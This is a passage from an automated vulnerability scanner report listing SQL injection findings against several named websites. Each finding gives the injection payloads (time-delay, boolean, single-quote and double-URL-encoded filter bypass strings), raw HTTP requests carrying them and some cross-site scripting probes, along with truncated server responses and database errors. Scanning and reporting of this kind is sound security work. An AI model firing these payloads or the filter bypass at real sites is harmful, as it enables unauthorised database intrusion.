The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payload ')waitfor%20delay'0%3a0%3a20'-- was submitted in the Referer HTTP header, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=')waitfor%20delay'0%3a0%3a20'--

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:19:21 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:20:21 GMT
Connection: close
Content-Type: text/html
Content-Length: 72906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/linuxjournal200009.php3">Serious Web Applications With PHP & PostgreSQL</a>
...[SNIP]...

1.131. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload " was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

Request

GET /?1"=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:18:59 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 18 Mar 2011 16:19:59 GMT
Connection: close
Content-Type: text/html
Content-Length: 72625


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...

1.132. http://www.phpbuilder.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phpbuilder.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be PostgreSQL.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Request 1

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie&1%2527=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 16:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 25 Mar 2011 16:49:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 72657


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...
<a href="/columns/tim20000705.php3">MySQL and PostgreSQL Compared</a>
...[SNIP]...

Request 2

GET /?7640d--%3E%3Cscript%3Ealert(document.cookie&1%2527%2527=1 HTTP/1.1
Host: www.phpbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Fri, 25 Mar 2011 16:48:28 GMT
Server: Apache
Cache-Control: max-age=60
Expires: Fri, 25 Mar 2011 16:49:28 GMT
Connection: close
Content-Type: text/html
Content-Length: 72622


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
   <title>PHPBuilder.com, the best reso
...[SNIP]...

1.133. http://www.prevention.com/cda/toolfinder.do [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.prevention.com
Path:   /cda/toolfinder.do

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /cda/toolfinder.do?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Fri, 18 Mar 2011 16:20:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61452


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsvoices;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=294x42.1;sz=294x42;ord=' + ord + '?" type="text/javascript">');
       document.writeln('</scri' + 'pt>');
    // ]]>
   // end hide from browsers --> </script>
   <noscript><A HREF="http://ad.doubleclick.net/jump/prevention/newsvoices;topic=In This Issuee;sbtpc=In This Issue;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" TARGET="_blank"><IMG SRC="http://ad.doubleclick.net/ad/prevention/newsvoices;topic=In This Issuee;sbtpc=In This Issue;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" BORDER="0" ALT="" HEIGHT="42" WIDTH="294"/></A></noscript>


   







       </div>
           

   
</div>

</div>
   <!-- END Mast -->



   <!-- START Topnav -->
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->

   
       

<div id="brWrap">

<!-- START Topnav -->

       
   
       
       
       
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->
    <div id="navBar"
    xmlns:fo="http://www.w3.org/1999/XSL/Format">
    <ul id="topNav">

                   <!-- "Home" nav -->
                   <li class="first">
                       <a href="http://www.prevention.com/health/" target="_top" tabindex="1" class="home">HOME</a>
                   </li>
                   
                   
                   
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/health" target="_top" title="Health" class="health" tabindex="2">HEALTH</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/weight-loss" target="_top" title="Weight Loss" class="weight loss" tabindex="3">WEIGHT LOSS</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the
...[SNIP]...

Request 2

GET /cda/toolfinder.do?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.prevention.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en
Cache-Control: max-age=1800
Date: Fri, 18 Mar 2011 16:20:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60067


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>


<head>
   
...[SNIP]...
<scri' + 'pt type="text/javascript" language="JavaScript" src="http://ad.doubleclick.net/adj/' + siteName + '/newsletters;' + rasegs + ';topic=' + topic + ';sbtpc=' + sbtpc + ';cat=' + cat + ';kw=;tile=' + tile++ + ';slot=294x42.1;sz=294x42;ord=' + ord + '?" type="text/javascript">');
       document.writeln('</scri' + 'pt>');
    // ]]>
   // end hide from browsers --> </script>
   <noscript><A HREF="http://ad.doubleclick.net/jump/prevention/newsletters;topic=;sbtpc=;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" TARGET="_blank"><IMG SRC="http://ad.doubleclick.net/ad/prevention/newsletters;topic=;sbtpc=;cat=;kw=;tile=1;slot=294x42.1;sz=294x42;ord=123456?" BORDER="0" ALT="" HEIGHT="42" WIDTH="294"/></A></noscript>


   







       </div>
           

   
</div>

</div>
   <!-- END Mast -->



   <!-- START Topnav -->
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->

   
       

<div id="brWrap">

<!-- START Topnav -->

       
   
       
       
       
   <!-- ## Div tag around each nav image is needed to fix space issues in IE ## -->
    <div id="navBar"
    xmlns:fo="http://www.w3.org/1999/XSL/Format">
    <ul id="topNav">

                   <!-- "Home" nav -->
                   <li class="first">
                       <a href="http://www.prevention.com/health/" target="_top" tabindex="1" class="home">HOME</a>
                   </li>
                   
                   
                   
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/health" target="_top" title="Health" class="health" tabindex="2">HEALTH</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
                       <a href="http://www.prevention.com/health/weight-loss" target="_top" title="Weight Loss" class="weight loss" tabindex="3">WEIGHT LOSS</a>
                       </li>
                       
                   
                       
                       
                       
                   <!-- hightlight the channel nav if it is the current channel -->
                   
                       <li>
                       
       
...[SNIP]...

1.134. http://www.slackbooks.com/essentialknee [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /essentialknee' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10019

<html>
<head>
<title>Unclosed quotation mark before the character string 'essentialknee''.<br>Line 1: Incorrect syntax near 'essentialknee''.</title>
<style>
body {fon
...[SNIP]...

Request 2

GET /essentialknee'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:25 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wjan3lrt1tzvkt45ygfq3fyw; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11938


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.135. http://www.slackbooks.com/essentialknee [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /essentialknee

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /essentialknee?1'=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:13 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9884

<html>
<head>
<title>Line 1: Incorrect syntax near '='.<br>Unclosed quotation mark before the character string ''.</title>
<style>
body {font-family:"Verdana";font-wei
...[SNIP]...

Request 2

GET /essentialknee?1''=1 HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=k1h22hnphd0xgw550u0i0u55; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11952


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.136. http://www.slackbooks.com/orthopedics [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.slackbooks.com
Path:   /orthopedics

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Microsoft SQL Server.

Request 1

GET /orthopedics' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Fri, 18 Mar 2011 16:24:33 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 9999

<html>
<head>
<title>Unclosed quotation mark before the character string 'orthopedics''.<br>Line 1: Incorrect syntax near 'orthopedics''.</title>
<style>
body {font-fa
...[SNIP]...

Request 2

GET /orthopedics'' HTTP/1.1
Host: www.slackbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 18 Mar 2011 16:24:34 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=hup5s345prehnsykvmjirqmq; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 11930


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<!--
Site Name: Slackbooks.com
-->

<html xmlns="http://www.w3.org/
...[SNIP]...

1.137. http://www.smartmoney.com/investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ [User-Agent HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.smartmoney.com
Path:   /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 52352249'%20or%201%3d1--%20 and 52352249'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52352249'%20or%201%3d1--%20
Connection: close

Response 1

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=E1EA67D1%2DF713%2D215A%2D3D3BD08057744793;domain=.smartmoney.com;expires=Sun, 10-Mar-2041 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8c45525d5f4f58455e445a4a423660;expires=Fri, 18-Mar-2011 16:37:01 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

   
   
...[SNIP]...
<script>var lqToken='5E66F8E33CDDF9159E57081FC9AD3F44';var lqData='*26.999|0.129,27.076|0.138,25.46|0.18,50.6186|0.3486,*128.371|1.074';useNLS=1;tickers='QAI,MCRO,MNA,ALT,SPY';</script>
   <script>document.write('<span id="stocktip"></span>');</script>
   <style type="text/css">#stocktip{z-index:5000;border:1px solid #666;background-color:#D0D7DF;padding:2px;display:none;position:absolute;top:250px;left:50px;width:205px;min-height:240px;}</style>
   <script language="JavaScript1.2" src="/shared/xmlhttp.js" type="text/javascript"></script>
   </head>
<body>

<div id="smWell">
   
<!-- Investing, ETFs -->


<!-- simulate these variables being set on actual wsj site -->
<script type='text/javascript'>
   var baseDomain = "http://www.smartmoney.com"
   var loggedIn = true;
   window.currentRegion = "na,us";
</script>

       <script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
   

   
   <div id="hat_div" class="hat_sm">
       <div id="hat_logo"></div>
       <ul class="hat_tabs">
           <li id="hat_tab1" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link1" href="http://online.wsj.com/home" onclick="hat.track('WSJ')"></a>
           </li>
           <li id="hat_tab2" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link2" href="http://www.marketwatch.com" onclick="hat.track('MW')"></a>
           </li>
           <li id="hat_tab3" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link3" href="http://online.barrons.com/home" onclick="hat.track('BOL')"></a>
           </li>
           <li id="hat_tab4" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link4" href="http://allthingsd.com" onclick="hat.track('ATD')"></a>
           </li>
           <li id="hat_tab6" class="hat_tabsel" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link6" href="http://www.smartmoney.com" onclick="hat.track('SM')"></a>
           </li>
           <li id="hat_tab5" class="hat_tab" onmouseover="hat.moremenu()" onmouseout="hat.moremenuhide()">
               <spa
...[SNIP]...

Request 2

GET /investing/etfsaa2c4'-alert(document.cookie)-'46ed6e85f39/are-hedgefund-etfs-worth-owning-1296838261078/ HTTP/1.1
Host: www.smartmoney.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)52352249'%20or%201%3d2--%20
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Fri, 18 Mar 2011 16:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: NEWSMIUSER=E1EA763C%2D904A%2DD08A%2DC1C80189EAF85CFF;domain=.smartmoney.com;expires=Sun, 10-Mar-2041 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: REFRESH=;domain=.smartmoney.com;expires=Thu, 18-Mar-2010 16:27:04 GMT;path=/
Set-Cookie: ISFINADVISE=%2D1;domain=.smartmoney.com;path=/
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: NSC_tnz-xxx-iuuq=ffffffff09f93b8c45525d5f4f58455e445a4a423660;expires=Fri, 18-Mar-2011 16:37:02 GMT;path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

   
   
...[SNIP]...
<script>var lqToken='5E66F8E33CDDF9159E57081FC9AD3F44';var lqData='*26.999|0.129,27.076|0.138,25.46|0.18,50.6186|0.3486,*128.37|1.073';useNLS=1;tickers='QAI,MCRO,MNA,ALT,SPY';</script>
   <script>document.write('<span id="stocktip"></span>');</script>
   <style type="text/css">#stocktip{z-index:5000;border:1px solid #666;background-color:#D0D7DF;padding:2px;display:none;position:absolute;top:250px;left:50px;width:205px;min-height:240px;}</style>
   <script language="JavaScript1.2" src="/shared/xmlhttp.js" type="text/javascript"></script>
   </head>
<body>

<div id="smWell">
   
<!-- Investing, ETFs -->


<!-- simulate these variables being set on actual wsj site -->
<script type='text/javascript'>
   var baseDomain = "http://www.smartmoney.com"
   var loggedIn = true;
   window.currentRegion = "na,us";
</script>

       <script type="text/javascript" src="http://c.wsj.net/dynamic/hat/hatloader3.js"></script>
   

   
   <div id="hat_div" class="hat_sm">
       <div id="hat_logo"></div>
       <ul class="hat_tabs">
           <li id="hat_tab1" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link1" href="http://online.wsj.com/home" onclick="hat.track('WSJ')"></a>
           </li>
           <li id="hat_tab2" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link2" href="http://www.marketwatch.com" onclick="hat.track('MW')"></a>
           </li>
           <li id="hat_tab3" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link3" href="http://online.barrons.com/home" onclick="hat.track('BOL')"></a>
           </li>
           <li id="hat_tab4" class="hat_tab" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link4" href="http://allthingsd.com" onclick="hat.track('ATD')"></a>
           </li>
           <li id="hat_tab6" class="hat_tabsel" onmouseover="hat.tabover(this)" onmouseout="hat.tabout(this)">
               <a id="hat_link6" href="http://www.smartmoney.com" onclick="hat.track('SM')"></a>
           </li>
           <li id="hat_tab5" class="hat_tab" onmouseover="hat.moremenu()" onmouseout="hat.moremenuhide()">
               <span
...[SNIP]...

1.138. http://www.thecounter.com/ [Referer HTTP header]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.thecounter.com
Path:   /

Issue detail

The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads 19067695'%20or%201%3d1--%20 and 19067695'%20or%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /?6955f--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19067695'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:29:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 44620

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=1135051107;u=j;z=20110318122908" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=1135051107;u=j;z=20110318122908" alt="Click here"></a>
</noscript>

</center>
</td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td width="357" rowspan="2"><img src="/img/logo_counter.gif" width="319" height="61" usemap="#counter" border="0" alt="the counter.com"><map name="counter"><area shape="rect" coords="10,20,273,54" href="http://www.thecounter.com"></map><img src="/img/counterfill.gif" width="38" height="61" alt="-"></td>
<td align="right" valign="middle"><a href="http://www.internet.com"><img src="/img/icomlogo.gif" width="132" height="20" vspace="5" hspace="5" border="0" alt="internet.com"></a></td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td align="left"><img src="/img/tabs_top_off.gif" width="423" height="18" border="0" alt="Top Navigation" vspace="0" hspace="0" usemap="#tabtop"><map name="tabtop"><area shape="polygon" coords="258, 1, 276, 16, 341, 16, 324, 1, 258, 1" href="http://www.internet.com/mediakit/"><area shape="polygon" coords="183, 1, 200, 16, 273, 16, 256, 1, 183, 1" href="http://www.TheCounter.com/help.php"><area shape="polygon" coords="89, 1, 106, 16, 196, 16, 180, 1, 89, 1" href="http://www.TheCounter.com/stats/"><area shape="polygon" coords="0, 16, 102, 16, 86, 1, 0, 1, 0, 16" href="http://www.internet.com/corporate/privacy/privacypolicy.html"></map></td>
</tr>
<tr>
<td valign="top"><img src="/img/tabs_bot_off.gif" width="358" height="14" usemap="#bottomtool" alt="Account Management Navigation" border="0"><map name="bottomtool"><area shape="polygon" coords="287, 13, 301, 0, 347, 0, 333, 13, 287, 13" href="http://www.TheCounter.com/login.php"><area shape="polygon" coords="182, 13, 195, 0, 297, 0, 285, 13, 182, 13" href="http://www.TheCounter.com/del_account.php"><area shape="polygon" coords="80, 13, 95, 0, 193,
...[SNIP]...

Request 2

GET /?6955f--%3E%3Cscript%3Ealert(document.cookie HTTP/1.1
Host: www.thecounter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=19067695'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Fri, 18 Mar 2011 16:29:08 GMT
Server: Apache
Connection: close
Content-Type: text/html
Content-Length: 44610

<html>
<head>
<title>TheCounter.com - The Affordable Web Site Analysis Tool</title>
<!-- test test -->

<LINK REL="stylesheet" HREF="/css/text.css" TYPE="text/css">
<meta http-equiv="Content-Type" con
...[SNIP]...
<a href="http://o1.qnsr.com/cgi/r?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=556143864;u=j;z=20110318122908" target="_blank">
<img border="0" width="728" height="90" src="http://o1.qnsr.com/cgi/x?;n=203;c=658843/658839/658829/658828/581034;s=10669;x=3584;f=556143864;u=j;z=20110318122908" alt="Click here"></a>
</noscript>

</center>
</td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td width="357" rowspan="2"><img src="/img/logo_counter.gif" width="319" height="61" usemap="#counter" border="0" alt="the counter.com"><map name="counter"><area shape="rect" coords="10,20,273,54" href="http://www.thecounter.com"></map><img src="/img/counterfill.gif" width="38" height="61" alt="-"></td>
<td align="right" valign="middle"><a href="http://www.internet.com"><img src="/img/icomlogo.gif" width="132" height="20" vspace="5" hspace="5" border="0" alt="internet.com"></a></td>
</tr>
<tr bgcolor="#003163" valign="bottom">
<td align="left"><img src="/img/tabs_top_off.gif" width="423" height="18" border="0" alt="Top Navigation" vspace="0" hspace="0" usemap="#tabtop"><map name="tabtop"><area shape="polygon" coords="258, 1, 276, 16, 341, 16, 324, 1, 258, 1" href="http://www.internet.com/mediakit/"><area shape="polygon" coords="183, 1, 200, 16, 273, 16, 256, 1, 183, 1" href="http://www.TheCounter.com/help.php"><area shape="polygon" coords="89, 1, 106, 16, 196, 16, 180, 1, 89, 1" href="http://www.TheCounter.com/stats/"><area shape="polygon" coords="0, 16, 102, 16, 86, 1, 0, 1, 0, 16" href="http://www.internet.com/corporate/privacy/privacypolicy.html"></map></td>
</tr>
<tr>
